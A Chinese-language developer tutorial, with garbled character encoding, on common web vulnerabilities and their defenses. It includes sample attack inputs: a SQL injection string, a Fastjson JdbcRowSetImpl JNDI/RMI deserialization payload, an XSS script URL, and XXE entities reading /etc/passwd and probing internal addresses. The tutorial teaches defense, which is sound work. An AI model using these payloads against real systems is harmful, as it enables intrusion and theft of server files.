前言

我們?nèi)粘ｉ_發(fā)中，很多小伙伴容易忽視安全漏洞問(wèn)題，認(rèn)為只要正常實(shí)現(xiàn)業(yè)務(wù)邏輯就可以了。其實(shí)，安全性才是最重要的。本文將跟大家一起學(xué)習(xí)常見的安全漏洞問(wèn)題，希望對(duì)大家有幫助哈。如果本文有什么錯(cuò)誤的話，希望大家提出哈，感謝感謝~

1. SQL 注入

1.1 什么是SQL注入？

SQL注入是一種代碼注入技術(shù)，一般被應(yīng)用于攻擊web應(yīng)用程序。它通過(guò)在web應(yīng)用接口傳入一些特殊參數(shù)字符，來(lái)欺騙應(yīng)用服務(wù)器，執(zhí)行惡意的SQL命令，以達(dá)到非法獲取系統(tǒng)信息的目的。它目前是黑客對(duì)數(shù)據(jù)庫(kù)進(jìn)行攻擊的最常用手段之一。

1.2 SQL注入是如何攻擊的？

舉個(gè)常見的業(yè)務(wù)場(chǎng)景：在web表單搜索框輸入員工名字，然后后臺(tái)查詢出對(duì)應(yīng)名字的員工。

這種場(chǎng)景下，一般都是前端頁(yè)面把一個(gè)名字參數(shù)name傳到后臺(tái)，然后后臺(tái)通過(guò)SQL把結(jié)果查詢出來(lái)

name = "田螺"; //前端傳過(guò)來(lái)的

SQL= "select * from staff where name=" + name;  //根據(jù)前端傳過(guò)來(lái)的name參數(shù)，查詢數(shù)據(jù)庫(kù)員工表staff

因?yàn)镾QL是直接拼接的，如果我們完全信任前端傳的參數(shù)的話。假如前端傳這么一個(gè)參數(shù)時(shí)'' or '1'='1'，SQL就變成醬紫的啦。

select * from staff where name='' or '1'='1';

這個(gè)SQL會(huì)把所有的員工信息全都查出來(lái)了，醬紫請(qǐng)求用戶已經(jīng)越權(quán)啦。請(qǐng)求者可以獲取所有員工的信息，其他用戶信息已經(jīng)暴露了啦。

1.3 如何預(yù)防SQL注入問(wèn)題

1.3.1 使用#{}而不是${}

在MyBatis中,使用#{}而不是${}，可以很大程度防止sql注入。

★

• 因?yàn)?code style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;word-break: break-all;">#{}是一個(gè)參數(shù)占位符，對(duì)于字符串類型，會(huì)自動(dòng)加上""，其他類型不加。由于Mybatis采用預(yù)編譯，其后的參數(shù)不會(huì)再進(jìn)行SQL編譯，所以一定程度上防止SQL注入。
• ${}是一個(gè)簡(jiǎn)單的字符串替換，字符串是什么，就會(huì)解析成什么，存在SQL注入風(fēng)險(xiǎn)

”

1.3.2 不要暴露一些不必要的日志或者安全信息，比如避免直接響應(yīng)一些sql異常信息。

如果SQL發(fā)生異常了，不要把這些信息暴露響應(yīng)給用戶，可以自定義異常進(jìn)行響應(yīng)

1.3.3 不相信任何外部輸入?yún)?shù)，過(guò)濾參數(shù)中含有的一些數(shù)據(jù)庫(kù)關(guān)鍵詞關(guān)鍵詞

可以加個(gè)參數(shù)校驗(yàn)過(guò)濾的方法，過(guò)濾union，or等數(shù)據(jù)庫(kù)關(guān)鍵詞

1.3.4 適當(dāng)?shù)臋?quán)限控制

在你查詢信息時(shí)，先校驗(yàn)下當(dāng)前用戶是否有這個(gè)權(quán)限。比如說(shuō)，實(shí)現(xiàn)代碼的時(shí)候，可以讓用戶多傳一個(gè)企業(yè)Id什么的，或者獲取當(dāng)前用戶的session信息等，在查詢前，先校驗(yàn)一下當(dāng)前用戶是否是這個(gè)企業(yè)下的等等，是的話才有這個(gè)查詢員工的權(quán)限。

2. JSON反序列化漏洞——如Fastjson安全漏洞

2.1 什么是JSON序列化，JSON發(fā)序列化

• 序列化：把對(duì)象轉(zhuǎn)換為字節(jié)序列的過(guò)程
• 反序列：把字節(jié)序列恢復(fù)為Java對(duì)象的過(guò)程

Json序列化就是將對(duì)象轉(zhuǎn)換成Json格式的字符串，JSON反序列化就是Json串轉(zhuǎn)換成對(duì)象

2.2 JSON 反序列化漏洞是如何被攻擊？

不安全的反序列化可以導(dǎo)致遠(yuǎn)程代碼執(zhí)行、重放攻擊、注入攻擊或特權(quán)升級(jí)攻擊。之前Fastjson頻繁爆出安全漏洞，我們現(xiàn)在分析fastjson 1.2.24版本的一個(gè)反序列化漏洞吧，這個(gè)漏洞比較常見的利用手法就是通過(guò)jndi注入的方式實(shí)現(xiàn)RCE。

我們先來(lái)看fastjson一個(gè)反序列化的簡(jiǎn)單例子：

public class User {
    private String name;

    private int age;

    public String getName() {
        return name;
    }

    public void setName(String name) {
        System.out.println("調(diào)用了name方法");
        this.name = name;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        System.out.println("調(diào)用了age方法");
        this.age = age;
    }

    public static void main(String[] args) {
        String str = "{\"@type\":\"cn.eovie.bean.User\",\"age\":26,\"name\":\"撿田螺的小男孩\"}";
        User user = JSON.parseObject(str,User.class);
    }
}

運(yùn)行結(jié)果：

調(diào)用了age方法
調(diào)用了name方法

加了@type屬性就能調(diào)用對(duì)應(yīng)對(duì)象的setXXX方法，而@type表示指定反序列化成某個(gè)類。如果我們能夠找到一個(gè)類，而這個(gè)類的某個(gè)setXXX方法中通過(guò)我們的精心構(gòu)造能夠完成命令執(zhí)行，即可達(dá)到攻擊的目的啦。

★

com.sun.rowset.JdbcRowSetImpl 就是類似這么一個(gè)類，它有兩個(gè)set方法，分別是setAutoCommit和setDataSourceName

”

有興趣的小伙伴，可以看下它的源代碼

  public void setDataSourceName(String var1) throws SQLException {
        if (this.getDataSourceName() != null) {
            if (!this.getDataSourceName().equals(var1)) {
                super.setDataSourceName(var1);
                this.conn = null;
                this.ps = null;
                this.rs = null;
            }
        } else {
            super.setDataSourceName(var1);
        }

    }
    
      public void setAutoCommit(boolean var1) throws SQLException {
        if (this.conn != null) {
            this.conn.setAutoCommit(var1);
        } else {
            this.conn = this.connect();
            this.conn.setAutoCommit(var1);
        }

    }
    
    private Connection connect() throws SQLException {
        if (this.conn != null) {
            return this.conn;
        } else if (this.getDataSourceName() != null) {
            try {
                InitialContext var1 = new InitialContext();
                DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());
                return this.getUsername() != null && !this.getUsername().equals("") ? var2.getConnection(this.getUsername(), this.getPassword()) : var2.getConnection();
            } catch (NamingException var3) {
                throw new SQLException(this.resBundle.handleGetObject("jdbcrowsetimpl.connect").toString());
            }
        } else {
            return this.getUrl() != null ? DriverManager.getConnection(this.getUrl(), this.getUsername(), this.getPassword()) : null;
        }
    }

setDataSourceName 簡(jiǎn)單設(shè)置了設(shè)置了dataSourceName的值，setAutoCommit中有connect操作，connect方法中有典型的jndi的lookup方法調(diào)用，參數(shù)剛好就是在setDataSourceName中設(shè)置的dataSourceName。

因此，有漏洞的反序列代碼實(shí)現(xiàn)如下即可：

public class FastjsonTest {

    public static void main(String[] argv){
        testJdbcRowSetImpl();
    }

    public static void testJdbcRowSetImpl(){
        //JDK 8u121以后版本需要設(shè)置改系統(tǒng)變量
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        //RMI
        String payload2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," +
                " \"autoCommit\":true}";
        JSONObject.parseObject(payload2);
    }
}

漏洞復(fù)現(xiàn)的流程如下哈：

參考的代碼來(lái)源這里哈，fastjson漏洞代碼測(cè)試（https://github.com/earayu/fastjson_jndi_poc）

如何解決json反序列化漏洞問(wèn)題

• 可以升級(jí)版本，比如fastjson后面版本，增強(qiáng)AutoType打開時(shí)的安全性 fastjson，增加了AutoType黑名單等等，都是為了應(yīng)對(duì)這些安全漏洞。
• 反序列化有fastjson、gson、jackson等等類型，可以替換其他類型。
• 升級(jí)+打開safemode

3. XSS 攻擊

3.1 什么是XSS？

★

XSS 攻擊全稱跨站腳本攻擊（Cross-Site Scripting），這會(huì)與層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆，因此有人將跨站腳本攻擊縮寫為XSS。它指的是惡意攻擊者往Web頁(yè)面里插入惡意html代碼，當(dāng)用戶瀏覽該頁(yè)之時(shí)，嵌入其中Web里面的html代碼會(huì)被執(zhí)行，從而達(dá)到惡意攻擊用戶的特殊目的。XSS攻擊一般分三種類型：存儲(chǔ)型 、反射型 、DOM型XSS

”

3.2 XSS是如何攻擊的？

拿反射型舉個(gè)例子吧，流程圖如下：

我們搞點(diǎn)簡(jiǎn)單代碼樣例吧，首先正常html頁(yè)面如下：

<input type="text" name="name" />
<input type="submit" value="搜索" onclick="http://127.0.0.1/search?name=">
</body>

1. 用戶輸入搜索信息，點(diǎn)擊搜索按鈕，就是到達(dá)正常服務(wù)器的。如果黑客在url后面的參數(shù)中加入如下的惡意攻擊代碼。

http://127.0.0.1/search?keyword="<a href ="http://www.baidu.com"><script>alert('XSS');</script></a>

2. 當(dāng)用戶打開帶有惡意代碼的URL的時(shí)候，正常服務(wù)器會(huì)解析出請(qǐng)求參數(shù) name，得到""，拼接到 HTML 中返回給瀏覽器。形成了如下的 HTML：

3. 用戶瀏覽器接收到響應(yīng)后執(zhí)行解析，其中的惡意代碼也會(huì)被執(zhí)行到。

4.這里的鏈接我寫的是百度搜索頁(yè)，實(shí)際上黑客攻擊的時(shí)候，是引誘用戶輸入某些重要信息，然后跳到他們自己的服務(wù)器，以竊取用戶提交的內(nèi)容信息。

3.3 如何解決XSS攻擊問(wèn)題

• 不相信用戶的輸入，對(duì)輸入進(jìn)行過(guò)濾，過(guò)濾標(biāo)簽等，只允許合法值。
• HTML 轉(zhuǎn)義
• 對(duì)于鏈接跳轉(zhuǎn)，如<a href="xxx" 等，要校驗(yàn)內(nèi)容，禁止以script開頭的非法鏈接。
• 限制輸入長(zhǎng)度等等

4. CSRF 攻擊

4.1 什么是CSRF 攻擊？

CSRF，跨站請(qǐng)求偽造（英語(yǔ)：Cross-site request forgery），簡(jiǎn)單點(diǎn)說(shuō)就是，攻擊者盜用了你的身份，以你的名義發(fā)送惡意請(qǐng)求。跟跨網(wǎng)站腳本（XSS）相比，XSS 利用的是用戶對(duì)指定網(wǎng)站的信任，CSRF 利用的是網(wǎng)站對(duì)用戶網(wǎng)頁(yè)瀏覽器的信任。

4.2 CSRF是如何攻擊的呢？

我們來(lái)看下這個(gè)例子哈（來(lái)自百度百科）

1. Tom 登陸銀行，沒有退出，瀏覽器包含了Tom在銀行的身份認(rèn)證信息。
   
   
2. 黑客Jerry將偽造的轉(zhuǎn)賬請(qǐng)求，包含在在帖子
   
   
3. Tom在銀行網(wǎng)站保持登陸的情況下，瀏覽帖子
   
   
4. 將偽造的轉(zhuǎn)賬請(qǐng)求連同身份認(rèn)證信息，發(fā)送到銀行網(wǎng)站
   
   
5. 銀行網(wǎng)站看到身份認(rèn)證信息，以為就是Tom的合法操作，最后造成Tom資金損失。

4.3 如何解決CSRF攻擊

• 檢查Referer字段。HTTP頭中有一個(gè)Referer字段，這個(gè)字段用以標(biāo)明請(qǐng)求來(lái)源于哪個(gè)地址。
• 添加校驗(yàn)token。

5. 文件上傳下載漏洞

5.1 文件上傳漏洞

★

文件上傳漏洞是指用戶上傳了一個(gè)可執(zhí)行的腳本文件，并通過(guò)此腳本文件獲得了執(zhí)行服務(wù)器端命令的能力。常見場(chǎng)景是web服務(wù)器允許用戶上傳圖片或者普通文本文件保存，而用戶繞過(guò)上傳機(jī)制上傳惡意代碼并執(zhí)行從而控制服務(wù)器。

”

解決辦法一般就是：

• 限制服務(wù)器相關(guān)文件目錄的權(quán)限
• 校驗(yàn)上傳的文件，如后綴名 禁止上傳惡意代碼的文件
• 盡量禁止使用前端上傳的文件名

5.2 文件下載漏洞

文件下載漏洞，舉個(gè)例子，使用 .. 等字符，使應(yīng)用讀取到指定目錄之外的其他目錄中的文件內(nèi)容，從而可能讀取到服務(wù)器的其他相關(guān)重要信息。

6. 敏感數(shù)據(jù)泄露

這個(gè)相對(duì)比較好理解，一般敏感信息包括密碼、用戶手機(jī)身份證信息、財(cái)務(wù)數(shù)據(jù)等等，由于web應(yīng)用或者API未加密或者疏忽保護(hù)，導(dǎo)致這些數(shù)據(jù)極易被黑客利用。所以我們需要保護(hù)好用戶的隱私數(shù)據(jù)，比如用戶密碼加密保存，請(qǐng)求采用https加密，重要第三方接口采用加簽驗(yàn)簽，服務(wù)端日志不打印敏感數(shù)據(jù)等等。

7. XXE 漏洞

7.1 什么是XXE

★

XXE就是XML外部實(shí)體注入。當(dāng)允許引用外部實(shí)體時(shí)，通過(guò)構(gòu)造惡意內(nèi)容，就可能導(dǎo)致任意文件讀取、系統(tǒng)命令執(zhí)行、內(nèi)網(wǎng)端口探測(cè)、攻擊內(nèi)網(wǎng)網(wǎng)站等危害。

”

7.2 XXE三種攻擊場(chǎng)景

• 場(chǎng)景1. 攻擊者嘗試從服務(wù)端提取數(shù)據(jù)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY file SYSTEM "file:///etc/passwd">]>
]>
<foo>&xxe;</foo>

• 場(chǎng)景2. 攻擊者通過(guò)將上面的實(shí)體行更改為一下內(nèi)容來(lái)探測(cè)服務(wù)器的專用網(wǎng)絡(luò)

<!ENTITY xxe SYSTEM "https://192.168.1.1/private">]>

• 場(chǎng)景3. 攻擊者通過(guò)惡意文件執(zhí)行拒絕服務(wù)攻擊

<!ENTITY xxe SYSTEM "file:///dev/random">]>

7.3 如何防御XXE

• 使用開發(fā)語(yǔ)言提供的禁用外部實(shí)體的方法
• 過(guò)濾用戶提交的XML數(shù)據(jù)，過(guò)濾<!DOCTYPE和<!ENTITY等關(guān)鍵詞。

8. DDoS 攻擊

8.1 什么是DDos攻擊

DDoS 攻擊，英文全稱是 Distributed Denial of Service，谷歌翻譯過(guò)來(lái)就是“分布式拒絕服務(wù)”。一般來(lái)說(shuō)是指攻擊者對(duì)目標(biāo)網(wǎng)站在較短的時(shí)間內(nèi)發(fā)起大量請(qǐng)求，大規(guī)模消耗目標(biāo)網(wǎng)站的主機(jī)資源，讓它無(wú)法正常服務(wù)。在線游戲、互聯(lián)網(wǎng)金融等領(lǐng)域是 DDoS 攻擊的高發(fā)行業(yè)。

為了方便理解，引用一下知乎上一個(gè)非常經(jīng)典的例子

★

我開了一家有五十個(gè)座位的重慶火鍋店，由于用料上等，童叟無(wú)欺。平時(shí)門庭若市，生意特別紅火，而對(duì)面二狗家的火鍋店卻無(wú)人問(wèn)津。二狗為了對(duì)付我，想了一個(gè)辦法，叫了五十個(gè)人來(lái)我的火鍋店坐著卻不點(diǎn)菜，讓別的客人無(wú)法吃飯。

”

8.2 如何應(yīng)對(duì) DDoS 攻擊？

• 高防服務(wù)器，即能獨(dú)立硬防御 50Gbps 以上的服務(wù)器，能夠幫助網(wǎng)站拒絕服務(wù)攻擊，定期掃描網(wǎng)絡(luò)主節(jié)點(diǎn)等
• 黑名單
• DDoS 清洗
• CDN 加速

9. 框架或應(yīng)用漏洞

• Struts 框架漏洞：遠(yuǎn)程命令執(zhí)行漏洞和開放重定向漏洞
• QQ Browser 9.6：API 權(quán)限控制問(wèn)題導(dǎo)致泄露隱私模式
• Oracle GlassFish Server：REST CSRF
• WebLogic: 未授權(quán)命令執(zhí)行漏洞
• Hacking Docker：Registry API 未授權(quán)訪問(wèn)
• WordPress 4.7 / 4.7.1：REST API 內(nèi)容注入漏洞

10. 弱口令、證書有效性驗(yàn)證、內(nèi)部接口在公網(wǎng)暴露、未鑒權(quán)等權(quán)限相關(guān)漏洞

10.1 弱口令

★

• 空口令
• 口令長(zhǎng)度小于8
• 口令不應(yīng)該為連續(xù)的某個(gè)字符（QQQQQQ）
• 賬號(hào)密碼相同（例：root：root）
• 口令與賬號(hào)相反（例：root：toor）
• 口令純數(shù)字（例：112312324234， 電話號(hào)）
• 口令純字母（例：asdjfhask）
• 口令已數(shù)字代替字母（例：hello word， hell0 w0rd）
• 口令采用連續(xù)性組合（例：123456，abcdef，654321，fedcba）
• 服務(wù)/設(shè)備默認(rèn)出廠口令

”

10.2 證書有效性驗(yàn)證漏洞

如果不對(duì)證書進(jìn)行有效性驗(yàn)證，那https就如同虛設(shè)啦。

• 如果是客戶生成的證書，需要跟系統(tǒng)可信根CA形成信任鏈，不能為了解決ssl證書報(bào)錯(cuò)的問(wèn)題，選擇在客戶端代碼中信任客戶端中所有證書的方式。
• 證書快過(guò)期時(shí)，需要提前更換。

10.3 未鑒權(quán)等權(quán)限相關(guān)漏洞

一些比較重要的接口，一般建議鑒權(quán)。比如你查詢某賬號(hào)的轉(zhuǎn)賬記錄，肯定需要先校驗(yàn)該賬號(hào)是不是操作人旗下的啦。

參考與感謝

• 【入坑JAVA安全】fastjson中的jndi注入
• Web滲透之文件上傳漏洞總結(jié)
• XXE漏洞利用技巧：從XML到遠(yuǎn)程代碼執(zhí)行
• WEB應(yīng)用常見15種安全漏洞一覽
• 什么是 DDoS 攻擊？
• 弱口令總結(jié)（什么是弱口令）